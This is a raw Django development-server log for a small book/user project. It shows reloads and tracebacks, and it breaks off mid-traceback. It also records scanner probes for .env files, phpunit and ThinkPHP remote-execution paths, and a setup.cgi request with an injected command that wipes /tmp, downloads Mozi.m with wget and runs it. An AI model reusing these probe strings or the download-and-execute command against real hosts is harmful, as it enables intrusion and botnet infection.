Watching for file changes with StatReloader
[04/Jul/2021 21:32:53] "POST /admin/login/?next=/admin/ HTTP/1.0" 200 2384
[04/Jul/2021 21:32:53] "GET /static/admin/css/fonts.css HTTP/1.0" 304 0
[04/Jul/2021 21:32:53] "GET /static/admin/js/nav_sidebar.js HTTP/1.0" 304 0
[04/Jul/2021 21:32:53] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 304 0
[04/Jul/2021 21:32:53] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 304 0
[04/Jul/2021 21:33:00] "GET /admin/ HTTP/1.0" 302 0
[04/Jul/2021 21:33:00] "GET /admin/login/?next=/admin/ HTTP/1.0" 200 2223
[04/Jul/2021 21:33:00] "GET /admin/ HTTP/1.0" 302 0
[04/Jul/2021 21:33:00] "GET /admin/login/?next=/admin/ HTTP/1.0" 200 2223
[04/Jul/2021 21:33:47] "POST /admin/login/?next=/admin/ HTTP/1.0" 200 2402
[04/Jul/2021 21:33:57] "POST /admin/login/?next=/admin/ HTTP/1.0" 200 2402
/home/ec2-user/ones/ones/settings.py changed, reloading.
Performing system checks...

System check identified no issues (0 silenced).
July 04, 2021 - 21:32:50
Django version 3.2.5, using settings 'ones.settings'
Starting development server at http://127.0.0.1:8000/
Quit the server with CONTROL-C.
Watching for file changes with StatReloader
[04/Jul/2021 21:35:46] "POST /admin/login/?next=/admin/ HTTP/1.0" 200 2402
/home/ec2-user/ones/ones/settings.py changed, reloading.
Performing system checks...

System check identified no issues (0 silenced).
July 04, 2021 - 21:35:41
Django version 3.2.5, using settings 'ones.settings'
Starting development server at http://127.0.0.1:8000/
Quit the server with CONTROL-C.
Watching for file changes with StatReloader
/home/ec2-user/ones/ones/settings.py changed, reloading.
Performing system checks...

System check identified no issues (0 silenced).
July 04, 2021 - 21:36:51
Django version 3.2.5, using settings 'ones.settings'
Starting development server at http://127.0.0.1:8000/
Quit the server with CONTROL-C.
Watching for file changes with StatReloader
/home/ec2-user/ones/user/models.py changed, reloading.
Performing system checks...

System check identified no issues (0 silenced).
July 04, 2021 - 21:38:34
Django version 3.2.5, using settings 'ones.settings'
Starting development server at http://127.0.0.1:8000/
Quit the server with CONTROL-C.
Watching for file changes with StatReloader
Exception in thread django-main-thread:
Traceback (most recent call last):
  File "/usr/lib64/python3.7/threading.py", line 926, in _bootstrap_inner
    self.run()
  File "/usr/lib64/python3.7/threading.py", line 870, in run
    self._target(*self._args, **self._kwargs)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/utils/autoreload.py", line 64, in wrapper
    fn(*args, **kwargs)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/core/management/commands/runserver.py", line 110, in inner_run
    autoreload.raise_last_exception()
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/utils/autoreload.py", line 87, in raise_last_exception
    raise _exception[1]
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/core/management/__init__.py", line 375, in execute
    autoreload.check_errors(django.setup)()
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/utils/autoreload.py", line 64, in wrapper
    fn(*args, **kwargs)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/__init__.py", line 24, in setup
    apps.populate(settings.INSTALLED_APPS)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/apps/registry.py", line 114, in populate
    app_config.import_models()
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/apps/config.py", line 301, in import_models
    self.models_module = import_module(models_module_name)
  File "/usr/lib64/python3.7/importlib/__init__.py", line 127, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 1006, in _gcd_import
  File "<frozen importlib._bootstrap>", line 983, in _find_and_load
  File "<frozen importlib._bootstrap>", line 967, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 677, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 724, in exec_module
  File "<frozen importlib._bootstrap_external>", line 860, in get_code
  File "<frozen importlib._bootstrap_external>", line 791, in source_to_code
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "/home/ec2-user/ones/user/models.py", line 28
    password = password
           ^
SyntaxError: invalid syntax

/home/ec2-user/ones/user/models.py changed, reloading.
Watching for file changes with StatReloader
/home/ec2-user/ones/user/models.py changed, reloading.
Performing system checks...

System check identified no issues (0 silenced).
July 04, 2021 - 21:39:43
Django version 3.2.5, using settings 'ones.settings'
Starting development server at http://127.0.0.1:8000/
Quit the server with CONTROL-C.
Watching for file changes with StatReloader
/home/ec2-user/ones/user/models.py changed, reloading.
Performing system checks...

System check identified no issues (0 silenced).
July 04, 2021 - 21:39:47
Django version 3.2.5, using settings 'ones.settings'
Starting development server at http://127.0.0.1:8000/
Quit the server with CONTROL-C.
Watching for file changes with StatReloader
/home/ec2-user/ones/user/models.py changed, reloading.
Performing system checks...

System check identified no issues (0 silenced).
July 04, 2021 - 21:39:50
Django version 3.2.5, using settings 'ones.settings'
Starting development server at http://127.0.0.1:8000/
Quit the server with CONTROL-C.
Watching for file changes with StatReloader
[04/Jul/2021 21:42:49] "POST /admin/login/?next=/admin/ HTTP/1.0" 302 0
Internal Server Error: /admin/
Traceback (most recent call last):
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
    response = get_response(request)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/core/handlers/base.py", line 181, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/contrib/admin/sites.py", line 250, in wrapper
    return self.admin_view(view, cacheable)(*args, **kwargs)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/utils/decorators.py", line 130, in _wrapped_view
    response = view_func(request, *args, **kwargs)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/views/decorators/cache.py", line 44, in _wrapped_view_func
    response = view_func(request, *args, **kwargs)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/contrib/admin/sites.py", line 232, in inner
    return view(request, *args, **kwargs)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/views/decorators/cache.py", line 44, in _wrapped_view_func
    response = view_func(request, *args, **kwargs)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/contrib/admin/sites.py", line 522, in index
    app_list = self.get_app_list(request)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/contrib/admin/sites.py", line 505, in get_app_list
    app_dict = self._build_app_dict(request)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/contrib/admin/sites.py", line 450, in _build_app_dict
    has_module_perms = model_admin.has_module_permission(request)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/contrib/admin/options.py", line 548, in has_module_permission
    return request.user.has_module_perms(self.opts.app_label)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/utils/functional.py", line 247, in inner
    return func(self._wrapped, *args)
AttributeError: 'User' object has no attribute 'has_module_perms'
[04/Jul/2021 21:42:49] "GET /admin/ HTTP/1.0" 500 101340
/home/ec2-user/ones/user/models.py changed, reloading.
Performing system checks...

System check identified no issues (0 silenced).
July 04, 2021 - 21:39:58
Django version 3.2.5, using settings 'ones.settings'
Starting development server at http://127.0.0.1:8000/
Quit the server with CONTROL-C.
Watching for file changes with StatReloader
[04/Jul/2021 21:43:42] "GET /admin/ HTTP/1.0" 200 3571
[04/Jul/2021 21:43:42] "GET /static/admin/css/dashboard.css HTTP/1.0" 200 380
[04/Jul/2021 21:43:42] "GET /static/admin/img/icon-addlink.svg HTTP/1.0" 200 331
[04/Jul/2021 21:43:42] "GET /static/admin/img/icon-changelink.svg HTTP/1.0" 200 380
[04/Jul/2021 21:43:44] "GET /admin/user/user/ HTTP/1.0" 200 7459
[04/Jul/2021 21:43:44] "GET /admin/jsi18n/ HTTP/1.0" 200 8330
[04/Jul/2021 21:43:44] "GET /static/admin/js/jquery.init.js HTTP/1.0" 200 347
[04/Jul/2021 21:43:44] "GET /static/admin/js/prepopulate.js HTTP/1.0" 200 1531
[04/Jul/2021 21:43:44] "GET /static/admin/js/actions.js HTTP/1.0" 200 7664
[04/Jul/2021 21:43:44] "GET /static/admin/css/changelists.css HTTP/1.0" 304 0
[04/Jul/2021 21:43:44] "GET /static/admin/js/core.js HTTP/1.0" 304 0
[04/Jul/2021 21:43:44] "GET /static/admin/js/admin/RelatedObjectLookups.js HTTP/1.0" 304 0
[04/Jul/2021 21:43:44] "GET /static/admin/js/urlify.js HTTP/1.0" 304 0
[04/Jul/2021 21:43:44] "GET /static/admin/img/tooltag-add.svg HTTP/1.0" 200 331
Not Found: /favicon.ico
[04/Jul/2021 21:43:44] "GET /favicon.ico HTTP/1.0" 404 2108
[04/Jul/2021 21:43:47] "GET /admin/user/user/1/change/ HTTP/1.0" 200 14090
[04/Jul/2021 21:43:47] "GET /static/admin/js/calendar.js HTTP/1.0" 200 8466
[04/Jul/2021 21:43:47] "GET /admin/jsi18n/ HTTP/1.0" 200 8330
[04/Jul/2021 21:43:47] "GET /static/admin/js/change_form.js HTTP/1.0" 200 606
[04/Jul/2021 21:43:47] "GET /static/admin/js/prepopulate_init.js HTTP/1.0" 200 492
[04/Jul/2021 21:43:47] "GET /static/admin/css/forms.css HTTP/1.0" 304 0
[04/Jul/2021 21:43:47] "GET /static/admin/js/admin/DateTimeShortcuts.js HTTP/1.0" 304 0
[04/Jul/2021 21:43:47] "GET /static/admin/css/widgets.css HTTP/1.0" 200 11097
Not Found: /favicon.ico
[04/Jul/2021 21:43:47] "GET /static/admin/img/icon-calendar.svg HTTP/1.0" 200 1086
[04/Jul/2021 21:43:47] "GET /favicon.ico HTTP/1.0" 404 2108
[04/Jul/2021 21:43:47] "GET /static/admin/img/icon-clock.svg HTTP/1.0" 304 0
[04/Jul/2021 21:43:52] "GET /admin/user/user/1/delete/ HTTP/1.0" 200 4660
[04/Jul/2021 21:43:52] "GET /static/admin/js/cancel.js HTTP/1.0" 200 884
Not Found: /favicon.ico
[04/Jul/2021 21:43:52] "GET /favicon.ico HTTP/1.0" 404 2108
[04/Jul/2021 21:43:54] "POST /admin/user/user/1/delete/ HTTP/1.0" 302 0
[04/Jul/2021 21:43:54] "GET /admin/user/user/ HTTP/1.0" 200 7128
[04/Jul/2021 21:43:54] "GET /admin/jsi18n/ HTTP/1.0" 200 8330
Not Found: /admin/user/img/icon-yes.svg
[04/Jul/2021 21:43:54] "GET /admin/user/img/icon-yes.svg HTTP/1.0" 404 4361
[04/Jul/2021 21:43:55] "GET /admin/user/user/2/change/ HTTP/1.0" 200 14143
[04/Jul/2021 21:43:55] "GET /admin/jsi18n/ HTTP/1.0" 200 8330
Not Found: /favicon.ico
[04/Jul/2021 21:43:55] "GET /favicon.ico HTTP/1.0" 404 2108
[04/Jul/2021 21:43:57] "GET /admin/user/user/2/delete/ HTTP/1.0" 200 4763
Not Found: /favicon.ico
[04/Jul/2021 21:43:57] "GET /favicon.ico HTTP/1.0" 404 2108
[04/Jul/2021 21:43:58] "POST /admin/user/user/2/delete/ HTTP/1.0" 302 0
[04/Jul/2021 21:43:58] "GET /admin/user/user/ HTTP/1.0" 302 0
[04/Jul/2021 21:43:58] "GET /admin/login/?next=/admin/user/user/ HTTP/1.0" 200 2425
[04/Jul/2021 21:43:58] "GET /admin/img/icon-yes.svg HTTP/1.0" 302 0
[04/Jul/2021 21:43:58] "GET /admin/login/?next=/admin/img/icon-yes.svg HTTP/1.0" 200 2255
Not Found: /favicon.ico
[04/Jul/2021 21:43:58] "GET /favicon.ico HTTP/1.0" 404 2108
[04/Jul/2021 21:44:13] "GET / HTTP/1.0" 200 10773
[04/Jul/2021 21:44:22] "POST /admin/login/?next=/admin/user/user/ HTTP/1.0" 302 0
[04/Jul/2021 21:44:22] "GET /admin/user/user/ HTTP/1.0" 200 6952
[04/Jul/2021 21:44:22] "GET /admin/jsi18n/ HTTP/1.0" 200 8330
[04/Jul/2021 21:44:25] "GET /admin/ HTTP/1.0" 200 3579
/home/ec2-user/ones/ones/settings.py changed, reloading.
Performing system checks...

System check identified no issues (0 silenced).
July 04, 2021 - 21:43:25
Django version 3.2.5, using settings 'ones.settings'
Starting development server at http://127.0.0.1:8000/
Quit the server with CONTROL-C.
Watching for file changes with StatReloader
[04/Jul/2021 22:50:09] "GET / HTTP/1.0" 200 10773
Not Found: /clientaccesspolicy.xml
[04/Jul/2021 22:54:00] "GET /clientaccesspolicy.xml HTTP/1.0" 404 2141
Not Found: /config/getuser
[04/Jul/2021 23:12:51] "GET /config/getuser?index=0 HTTP/1.0" 404 2125
[04/Jul/2021 23:51:29] "GET / HTTP/1.0" 200 10773
Not Found: /.env
[05/Jul/2021 01:14:08] "GET /.env HTTP/1.0" 404 2087
[05/Jul/2021 01:14:09] "POST / HTTP/1.0" 200 10773
[05/Jul/2021 02:31:11] "GET / HTTP/1.0" 200 10773
[05/Jul/2021 02:32:03] "GET / HTTP/1.0" 200 10773
Not Found: /.env
[05/Jul/2021 03:12:00] "GET /.env HTTP/1.0" 404 2087
[05/Jul/2021 03:12:00] "POST / HTTP/1.0" 200 10773
Not Found: /actuator/health
[05/Jul/2021 03:48:00] "GET /actuator/health HTTP/1.0" 404 2120
[05/Jul/2021 04:05:59] "GET / HTTP/1.0" 200 10773
Not Found: /hudson
[05/Jul/2021 04:29:16] "GET /hudson HTTP/1.0" 404 2093
[05/Jul/2021 04:33:44] "GET / HTTP/1.0" 200 10773
Not Found: /manager/text/list
[05/Jul/2021 04:58:31] "GET /manager/text/list HTTP/1.0" 404 2126
Not Found: /_ignition/execute-solution
[05/Jul/2021 05:28:21] "GET /_ignition/execute-solution HTTP/1.0" 404 2153
Not Found: /TP/public/index.php
[05/Jul/2021 05:33:55] "GET /TP/public/index.php HTTP/1.0" 404 2132
[05/Jul/2021 05:34:00] "GET / HTTP/1.0" 200 10773
[05/Jul/2021 06:16:13] "GET / HTTP/1.0" 200 10773
[05/Jul/2021 06:26:02] "POST / HTTP/1.0" 200 10773
Not Found: /.env
[05/Jul/2021 06:26:03] "GET /.env HTTP/1.0" 404 2087
Not Found: /.env
[05/Jul/2021 07:15:52] "GET /.env HTTP/1.0" 404 2087
[05/Jul/2021 07:15:53] "POST / HTTP/1.0" 200 10773
Not Found: /manager/html
[05/Jul/2021 07:36:56] "GET /manager/html HTTP/1.0" 404 2111
Not Found: /api/jsonws/invoke
[05/Jul/2021 07:45:38] "POST /api/jsonws/invoke HTTP/1.0" 404 2127
Not Found: /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
[05/Jul/2021 07:45:38] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 2226
Not Found: /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
[05/Jul/2021 07:45:38] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 2225
Not Found: /solr/admin/info/system
[05/Jul/2021 07:45:38] "GET /solr/admin/info/system?wt=json HTTP/1.0" 404 2149
[05/Jul/2021 07:45:38] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.0" 200 10773
Not Found: /index.php
[05/Jul/2021 07:45:38] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.0" 404 2221
[05/Jul/2021 07:45:40] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.0" 200 10773
Not Found: /wp-content/plugins/wp-file-manager/readme.txt
[05/Jul/2021 07:45:40] "GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.0" 404 2210
Not Found: /console/
[05/Jul/2021 07:45:40] "GET /console/ HTTP/1.0" 404 2099
Not Found: /Autodiscover/Autodiscover.xml
[05/Jul/2021 07:45:42] "POST /Autodiscover/Autodiscover.xml HTTP/1.0" 404 2163
Not Found: /_ignition/execute-solution
[05/Jul/2021 07:45:42] "GET /_ignition/execute-solution HTTP/1.0" 404 2153
Not Found: /.env
[05/Jul/2021 07:46:01] "GET /.env HTTP/1.0" 404 2087
[05/Jul/2021 07:46:01] "POST / HTTP/1.0" 200 10773
[05/Jul/2021 08:00:17] "GET / HTTP/1.0" 200 10773
[05/Jul/2021 08:05:49] "GET /admin/config.php HTTP/1.0" 302 0
[05/Jul/2021 08:16:20] "GET / HTTP/1.0" 200 10773
Not Found: /config/getuser
[05/Jul/2021 08:23:49] "GET /config/getuser?index=0 HTTP/1.0" 404 2125
[05/Jul/2021 08:42:38] "GET / HTTP/1.0" 200 10773
[05/Jul/2021 09:08:42] "GET / HTTP/1.0" 200 10773
Not Found: /setup.cgi
[05/Jul/2021 09:31:43] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 2264
[05/Jul/2021 09:52:38] "GET / HTTP/1.0" 200 10773
Not Found: /_profiler/phpinfo
[05/Jul/2021 10:23:53] "GET /_profiler/phpinfo HTTP/1.0" 404 2126
Not Found: /.env
[05/Jul/2021 10:48:15] "GET /.env HTTP/1.0" 404 2087
Not Found: /vendor/phpunit/phpunit/phpunit.xml
[05/Jul/2021 10:48:16] "GET /vendor/phpunit/phpunit/phpunit.xml HTTP/1.0" 404 2177
[05/Jul/2021 10:49:15] "GET / HTTP/1.0" 200 10773
[05/Jul/2021 11:02:54] "GET / HTTP/1.0" 200 10773
[05/Jul/2021 11:18:43] "GET / HTTP/1.0" 200 10773
Not Found: /robots.txt
[05/Jul/2021 11:18:46] "GET /robots.txt HTTP/1.0" 404 2105
Not Found: /sitemap.xml
[05/Jul/2021 11:18:47] "GET /sitemap.xml HTTP/1.0" 404 2108
Not Found: /.well-known/security.txt
[05/Jul/2021 11:18:47] "GET /.well-known/security.txt HTTP/1.0" 404 2147
Not Found: /favicon.ico
[05/Jul/2021 11:18:51] "GET /favicon.ico HTTP/1.0" 404 2108
[05/Jul/2021 11:18:56] "GET / HTTP/1.0" 200 10773
[05/Jul/2021 11:42:56] "GET / HTTP/1.0" 200 10773
[05/Jul/2021 12:04:59] "GET / HTTP/1.0" 200 10773
Not Found: /robots.txt
[05/Jul/2021 12:17:18] "HEAD /robots.txt HTTP/1.0" 404 2106
[05/Jul/2021 12:54:32] "GET / HTTP/1.0" 200 10773
Not Found: /blocks/latest
[05/Jul/2021 13:40:24] "GET /blocks/latest HTTP/1.0" 404 2114
[05/Jul/2021 14:09:48] "GET / HTTP/1.0" 200 10773
Not Found: /.env
[05/Jul/2021 14:22:35] "GET /.env HTTP/1.0" 404 2087
Not Found: /boaform/admin/formLogin
[05/Jul/2021 16:16:01] "POST /boaform/admin/formLogin HTTP/1.0" 404 2145
Not Found: /config/getuser
[05/Jul/2021 16:39:06] "GET /config/getuser?index=0 HTTP/1.0" 404 2125
[05/Jul/2021 17:27:03] "GET / HTTP/1.0" 200 10773
[05/Jul/2021 17:27:04] "GET / HTTP/1.0" 200 10773
Not Found: /solr/
[05/Jul/2021 17:47:25] "GET /solr/ HTTP/1.0" 404 2090
[05/Jul/2021 18:04:48] "GET / HTTP/1.0" 200 10773
Not Found: /.env
[05/Jul/2021 20:01:06] "GET /.env HTTP/1.0" 404 2087
[05/Jul/2021 20:01:07] "POST / HTTP/1.0" 200 10773
/home/ec2-user/ones/book/models/book_author.py changed, reloading.
Performing system checks...

System check identified no issues (0 silenced).
July 04, 2021 - 22:02:14
Django version 3.2.5, using settings 'ones.settings'
Starting development server at http://127.0.0.1:8000/
Quit the server with CONTROL-C.
Watching for file changes with StatReloader
/home/ec2-user/ones/book/models/book_author.py changed, reloading.
Performing system checks...

System check identified no issues (0 silenced).
July 05, 2021 - 21:46:38
Django version 3.2.5, using settings 'ones.settings'
Starting development server at http://127.0.0.1:8000/
Quit the server with CONTROL-C.
Watching for file changes with StatReloader
/home/ec2-user/ones/book/models/book_author.py changed, reloading.
Performing system checks...

System check identified no issues (0 silenced).
July 05, 2021 - 21:46:58
Django version 3.2.5, using settings 'ones.settings'
Starting development server at http://127.0.0.1:8000/
Quit the server with CONTROL-C.
Watching for file changes with StatReloader
[05/Jul/2021 21:48:29] "GET / HTTP/1.0" 200 10773
[05/Jul/2021 21:48:29] "GET /static/admin/css/fonts.css HTTP/1.0" 304 0
[05/Jul/2021 21:48:29] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 304 0
[05/Jul/2021 21:48:29] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 304 0
[05/Jul/2021 21:48:29] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 304 0
[05/Jul/2021 21:48:32] "GET / HTTP/1.0" 200 10773
[05/Jul/2021 21:48:33] "GET /admin/ HTTP/1.0" 200 3579
[05/Jul/2021 21:48:33] "GET /static/admin/css/base.css HTTP/1.0" 304 0
[05/Jul/2021 21:48:33] "GET /static/admin/css/nav_sidebar.css HTTP/1.0" 304 0
[05/Jul/2021 21:48:33] "GET /static/admin/css/login.css HTTP/1.0" 304 0
[05/Jul/2021 21:48:33] "GET /static/admin/js/nav_sidebar.js HTTP/1.0" 304 0
[05/Jul/2021 21:48:33] "GET /static/admin/js/nav_sidebar.js HTTP/1.0" 304 0
[05/Jul/2021 21:48:33] "GET /static/admin/css/nav_sidebar.css HTTP/1.0" 304 0
[05/Jul/2021 21:48:33] "GET /static/admin/css/responsive.css HTTP/1.0" 304 0
[05/Jul/2021 21:48:33] "GET /static/admin/css/dashboard.css HTTP/1.0" 304 0
[05/Jul/2021 21:48:33] "GET /static/admin/css/responsive.css HTTP/1.0" 304 0
[05/Jul/2021 21:48:33] "GET /static/admin/css/base.css HTTP/1.0" 304 0
[05/Jul/2021 21:48:33] "GET /static/admin/img/icon-changelink.svg HTTP/1.0" 304 0
[05/Jul/2021 21:48:33] "GET /static/admin/img/icon-addlink.svg HTTP/1.0" 304 0
Not Found: /.env
[05/Jul/2021 21:48:52] "GET /.env HTTP/1.0" 404 2087
[05/Jul/2021 21:48:52] "POST / HTTP/1.0" 200 10773
/home/ec2-user/ones/book/admin.py changed, reloading.
Performing system checks...

System check identified no issues (0 silenced).
July 05, 2021 - 21:47:02
Django version 3.2.5, using settings 'ones.settings'
Starting development server at http://127.0.0.1:8000/
Quit the server with CONTROL-C.
Watching for file changes with StatReloader
Exception in thread django-main-thread:
Traceback (most recent call last):
  File "/usr/lib64/python3.7/threading.py", line 926, in _bootstrap_inner
    self.run()
  File "/usr/lib64/python3.7/threading.py", line 870, in run
    self._target(*self._args, **self._kwargs)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/utils/autoreload.py", line 64, in wrapper
    fn(*args, **kwargs)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/core/management/commands/runserver.py", line 110, in inner_run
    autoreload.raise_last_exception()
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/utils/autoreload.py", line 87, in raise_last_exception
    raise _exception[1]
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/core/management/__init__.py", line 375, in execute
    autoreload.check_errors(django.setup)()
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/utils/autoreload.py", line 64, in wrapper
    fn(*args, **kwargs)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/__init__.py", line 24, in setup
    apps.populate(settings.INSTALLED_APPS)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/apps/registry.py", line 122, in populate
    app_config.ready()
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/contrib/admin/apps.py", line 27, in ready
    self.module.autodiscover()
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/contrib/admin/__init__.py", line 24, in autodiscover
    autodiscover_modules('admin', register_to=site)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/utils/module_loading.py", line 47, in autodiscover_modules
    import_module('%s.%s' % (app_config.name, module_to_search))
  File "/usr/lib64/python3.7/importlib/__init__.py", line 127, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 1006, in _gcd_import
  File "<frozen importlib._bootstrap>", line 983, in _find_and_load
  File "<frozen importlib._bootstrap>", line 967, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 677, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 728, in exec_module
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "/home/ec2-user/ones/book/admin.py", line 2, in <module>
    from models import book, book_author, author
ModuleNotFoundError: No module named 'models'

/home/ec2-user/ones/book/admin.py changed, reloading.
Watching for file changes with StatReloader
Exception in thread django-main-thread:
Traceback (most recent call last):
  File "/usr/lib64/python3.7/threading.py", line 926, in _bootstrap_inner
    self.run()
  File "/usr/lib64/python3.7/threading.py", line 870, in run
    self._target(*self._args, **self._kwargs)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/utils/autoreload.py", line 64, in wrapper
    fn(*args, **kwargs)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/core/management/commands/runserver.py", line 110, in inner_run
    autoreload.raise_last_exception()
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/utils/autoreload.py", line 87, in raise_last_exception
    raise _exception[1]
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/core/management/__init__.py", line 375, in execute
    autoreload.check_errors(django.setup)()
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/utils/autoreload.py", line 64, in wrapper
    fn(*args, **kwargs)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/__init__.py", line 24, in setup
    apps.populate(settings.INSTALLED_APPS)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/apps/registry.py", line 122, in populate
    app_config.ready()
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/contrib/admin/apps.py", line 27, in ready
    self.module.autodiscover()
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/contrib/admin/__init__.py", line 24, in autodiscover
    autodiscover_modules('admin', register_to=site)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/utils/module_loading.py", line 47, in autodiscover_modules
    import_module('%s.%s' % (app_config.name, module_to_search))
  File "/usr/lib64/python3.7/importlib/__init__.py", line 127, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 1006, in _gcd_import
  File "<frozen importlib._bootstrap>", line 983, in _find_and_load
  File "<frozen importlib._bootstrap>", line 967, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 677, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 728, in exec_module
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "/home/ec2-user/ones/book/admin.py", line 2, in <module>
    from models import book, book_author, author
ModuleNotFoundError: No module named 'models'

/home/ec2-user/ones/book/admin.py changed, reloading.
Watching for file changes with StatReloader
Exception in thread django-main-thread:
Traceback (most recent call last):
  File "/usr/lib64/python3.7/threading.py", line 926, in _bootstrap_inner
    self.run()
  File "/usr/lib64/python3.7/threading.py", line 870, in run
    self._target(*self._args, **self._kwargs)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/utils/autoreload.py", line 64, in wrapper
    fn(*args, **kwargs)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/core/management/commands/runserver.py", line 110, in inner_run
    autoreload.raise_last_exception()
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/utils/autoreload.py", line 87, in raise_last_exception
    raise _exception[1]
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/core/management/__init__.py", line 375, in execute
    autoreload.check_errors(django.setup)()
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/utils/autoreload.py", line 64, in wrapper
    fn(*args, **kwargs)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/__init__.py", line 24, in setup
    apps.populate(settings.INSTALLED_APPS)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/apps/registry.py", line 122, in populate
    app_config.ready()
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/contrib/admin/apps.py", line 27, in ready
    self.module.autodiscover()
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/contrib/admin/__init__.py", line 24, in autodiscover
    autodiscover_modules('admin', register_to=site)
  File "/home/ec2-user/.virtualenvs/ones/lib/python3.7/site-packages/django/utils/module_loading.py", line 47, in autodiscover_modules
    import_module('%s.%s' % (app_config.name, module_to_search))
  File "/usr/lib64/python3.7/importlib/__init__.py", line 127, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 1006, in _gcd_import
  File "<frozen importlib._bootstrap>", line 983, in _find_and_load
  File "<frozen importlib._bootstrap>", line 967, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 677, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 728, in exec_module
